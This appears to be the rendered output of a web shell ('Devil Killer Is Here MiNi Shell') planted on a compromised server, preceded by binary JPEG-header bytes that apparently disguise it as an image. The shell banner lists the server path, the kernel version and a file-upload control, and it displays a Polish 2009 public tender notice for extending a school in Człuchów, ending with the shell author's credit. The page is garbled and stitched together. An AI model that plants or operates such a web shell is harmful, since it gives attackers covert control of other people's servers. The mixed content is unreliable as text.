JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/54974-N-2009.html

<p class="kh_header"><b>Człuchów: Rozbudowa budynku Zespołu Szkół Agrobiznesu w  Człuchowie przy ulicy Parkowej 2.</b><br>
<b>Numer ogłoszenia: 54974 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Człuchowski , ul. Wojska Polskiego 1, 77-300 Człuchów, woj. pomorskie, tel. 059 8342539, 8343461 do 463, faks 059 8342539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.starostwo.czluchow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku Zespołu Szkół Agrobiznesu w  Człuchowie przy ulicy Parkowej 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty budowlane dotyczące rozbudowy budynku o wymiarach w rzucie 20,54m x 25,00m:
Wysokość 16,80 m
Powierzchnia zabudowy 514,80 m2
Powierzchnia ogólna 1.237,79 m2
Powierzchnia użytkowa 737,89 m2
Kubatura 7.089m3
Do bryły budynku głównego dobudowany będzie czterokondygnacyjny budynek z dachem stromym i elewacjami nawiązującymi do budynków istniejących na terenie inwestycji. Na najwyższej kondygnacji będzie znajdowała się sala gimnastyczna o wymiarach w świetle ścian 12,80 m X 23,48m i wysokości w świetle stropów 6,43 m oraz szatnie, umywalnie, sanitariaty i pomieszczenia dla trenerów. 
Na parterze przewidziano 2 węzły sanitarne ogólnodostępne oraz  pomieszczenia magazynowe. 
Na I piętrze zaprojektowano do wykonania 3 sale lekcyjne oraz 2 sale multimedialne.
Na II piętrze pomieszczenia pomocnicze. 
Budynek zostanie wyposażony w instalację kanalizacyjną, wodociągową, elektryczną,
odgromową, centralnego ogrzewania, telefoniczną i wentylacyjną. 
Projektowane rozwiązania materiałowo-konstrukcyjne:
1)	Fundamenty - monolityczne ławy żelbetowe
2)	Ściany fundamentowe - żelbetowe monolityczne, ocieplane warstwą styropianu.
3)	Ustrój nośny części nadziemnej budynku, układ ramowy głównie żelbetowy oparty na obwodzie budynku na żelbetowych ścianach fundamentowych oraz w części środkowej na ławach żelbetowych. Uzupełnienie ustroju nośnego budynku będą stanowiły stalowe wiązary kratowe oraz podciąg stalowy.
4)	Ściany:
a)	Wypełniające z bloczków  gazobetonowych o gr. 38 cm ocieplonych warstwą styropianu gr. 12 cm.
b)	Kolankowe z żelbetu gr. 38 cm monolityczne trwałe połączone z płytami stropowymi i układem ramowy budynku
c)	Działowe z płytek gazobetonowych oraz płyt gipsowo-kartonowych 
5)	Stropy z płyt kanałowych
6)	Schody żelbetowe płytowe dwubiegowe monolityczne oparte na żelbetowych belkach spocznikowych
7)	Dach - konstrukcja ze stalowych wiązarów jętkowych. Elementy uzupełniające oraz konstrukcja facjat z drewna konstrukcyjnego.
8)	Wentylacja grawitacyjna wspomagana elektrycznie wentylatorami z czujnikami wilgotności.
9)	Izolacje termiczne, akustyczne, paroszczelne, przeciwwilgotnościowe. 
10)	 Podłogi i posadzki:
a)	sala gimnastyczna - podłoga tzw. powierzchniowo sprężysta o konstrukcji drewnianej ułożonej na wylewce betonowej gr. 12 cm zazbrojonej  przeciwskurczowo. Podłogę należy wykonać w postaci rusztu z desek ułożonych krzyżowo na podkładach elastycznych, ślepej podłogi, płyty rozkładającej ciężar oraz nawierzchni. Na nawierzchnię podłogi przewidziano wykładzinę PCV sport
b)	umywalnie oraz wc z płytek ceramicznych typu GRESS
c)	pozostałe pomieszczenia, wykładziny homogeniczne
11)	 Wykończenie wewnętrzne:
a)	tynki wewnętrzne zwykłe, cementowo wapienne kat. III wykończone gładzią gipsową
b)	w wyznaczonych pomieszczeniach wg projektu wykończyć okładziną z płytek ceramicznych glazurowanych 
c)	malowanie ścian i sufitów farbami akrylowymi 
12)	Stolarka otworowa i ślusarka budowlana:
a)	okna w ścianach zewnętrznych z profili PCV, doświetlenie pomieszczeń poddasza oknami dachowymi typu FAKRO
b)	drzwi zgodnie z zestawieniem stolarki w zależności od ogniochronności 
c)	balustrady zabezpieczające klatkę schodową 
13)	Wykończenie zewnętrzne:
a)	 pokrycie dachu - blachodochówka
b)	stropodach - 2x papa zgrzewalna podkładowa+1x papa zgrzewalna wierzchniego krycia
c)	elewacje; tynk mineralny na styropianie, płytki klinkierowe oraz malowane.
        14)  Wyposażenie sali gimnastycznej wraz z montażem:
                  a) zestaw do koszykówki
                   b) zestaw do siatkówki
c)	 drabinki gimnastyczne 

Realizacja zamówienia musi być zgodna z obowiązującymi przepisami prawa budowlanego, normami i  warunkami technicznymi. Wykonawca odpowiada za jakość oraz zgodność z wymogami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia. Stosowane materiały muszą być fabrycznie nowe i odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w ustawie - Prawo budowlane.  Zamawiający wymaga stosownie do paragrafu 9 Rozporządzenia Ministra Edukacji i Sportu z dnia 31.12.2002 r. ( Dz.U. Nr 6 poz. 69 z 2003 r.), aby sprzęt sportowy stanowiący   wyposażenie sali gimnastycznej  posiadał odpowiednie i aktualne atesty, certyfikaty  zgodności, certyfikaty bezpieczeństwa wydane przez akredytowane przez Polskie Centrum Akredytacji jednostki certyfikujące wyroby.
Szczegółowy zakres wykonania robót zawierają:
a)	Przedmiar robót - załącznik nr 7 
b)	Dokumentacja projektowa -  załącznik nr 8 
c)	Szczegółowe specyfikacje techniczne  -  załącznik nr 9
Wymienione nazwy własne w dokumentacji projektowo - technicznej należy traktować jako typu. Można stosować materiały równoważne, co oznacza stosowanie materiałów  o parametrach technicznych co najmniej równych wymienionym w dokumentacji.

Zamawiający przewiduje płatność za wykonane roboty w terminie do 30 dni od daty odbioru robót i wystawienia faktury przez Wykonawcę. Wymaga się od Wykonawcy udzielenia gwarancji na wykonane roboty budowlane, na okres min. 60 m-cy, licząc od daty odbioru robót, okres gwarancji na sprzęt sportowy min. 24 m-ce od daty odbioru robót.

Zamawiający nie dopuszcza składania ofert częściowych 
Zamawiający przewiduje zamówienia uzupełniające
Zamawiający przewiduje możliwość zmiany postanowień umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.22.22-8, 45.21.42.00-2, 45.31.00.00-3, 45.33.12.10-1, 37.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany wnieść, na czas związania ofertą, wadium w wysokości 50.000,00 zł przed upływem terminu składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:

O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy spełnią następujące warunki:
1.  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
         1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
             działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
             ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
             terminu składania ofert,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych przedmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj
1)	zrealizowali minimum 2 zamówienia publiczne o wartości co najmniej 3 milionów złotych brutto w okresie ostatnich 5 lat odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, potwierdzone, że roboty te zostały wykonane należycie,
2)	osoby przewidziane do kierowania poszczególnymi robotami posiadają odpowiednie uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie i są członkami właściwej izby samorządu zawodowego posiadając wymagane ubezpieczenie od odpowiedzialności cywilnej.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1)	posiadają polisę na kwotę minimum 2 milionów złotych lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. 
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych
2) wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji
3) wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania
4) wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art.26 ust. 3 ustawy	
5) wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą
Zamawiający odrzuca ofertę, która:
1) jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,  zastrzeżeniem art. 87 ust. 2 pkt.3 ustawy pzp z dnia 29.I.2004 r.  (tekst jednolity  Dz.U. z 2007r.  nr  223 poz.1655 ze zm.)
2) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
3) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia
4) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert
5) zawiera błędy w obliczeniu ceny jeżeli w terminie 3 dni od dnia otrzymania zawiadomienia wykonawca nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3
7) jest nieważna na podstawie odrębnych przepisów
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy na podstawie dokumentów i oświadczeń przedłożonych wraz z ofertą wyszczególnionych w rozdziale VI SIWZ. Poszczególne warunki oceniane będą przez Zamawiającego metodą spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
1. Dokumenty wymagane:
1. Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1
2. Oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Wykonawca może złożyć zaświadczenie o wpisie do ewidencji działalności gospodarczej wydane z wcześniejszą datą, pod warunkiem, że urząd wydający zaświadczenie potwierdzi jego aktualność na dany dzień - stan aktualny na dzień .... przypadający na 6 miesięcy przed upływem terminu składania ofert.
4. Zrealizowali minimum 2 zamówienia publiczne o wartości co najmniej 3 milionów złotych brutto w okresie ostatnich 5 lat odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, potwierdzone, że roboty te zostały wykonane należycie - załącznik nr 3
5. Osoby przewidziane do kierowania poszczególnymi robotami posiadają odpowiednie uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie i są członkami właściwej izby samorządu zawodowego posiadając wymagane ubezpieczenie od odpowiedzialności cywilnej - załącznik nr 4
6. Harmonogram rzeczowo-finansowy robót - załącznik nr 5
7. Polisa na kwotę minimum 2 milionów złotych lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
8. Dowód wniesienia wadium
9. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.  
2. Dokumenty wymagane w przypadku składania oferty wspólnej
1) Pełnomocnictwo wg zasad określonych w dziale XI ust. 2.
2) Oferta winna zawierać dokumenty wymienione w ust. 1 pkt 2 i 3 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie
Wszystkie wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę - osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem. W przypadku pełnomocnictwa oraz umowy konsorcjum wymaga się przedstawienia oryginału lub kserokopii poświadczonej notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - termin wykonania - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.starostwo.czluchow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wdrożeń i Usług Technicznych prze Starostwie Powiatowym w Człuchowie 77-300 Człuchów ul. Wojska Polskiego 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 10:00, miejsce: Powiat Człuchowski ( budynek-Starostwo Powiatowe w Człuchowie), 77-300 Człuchów ul. Wojska Polskiego 1 sekretariat pokój 205.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com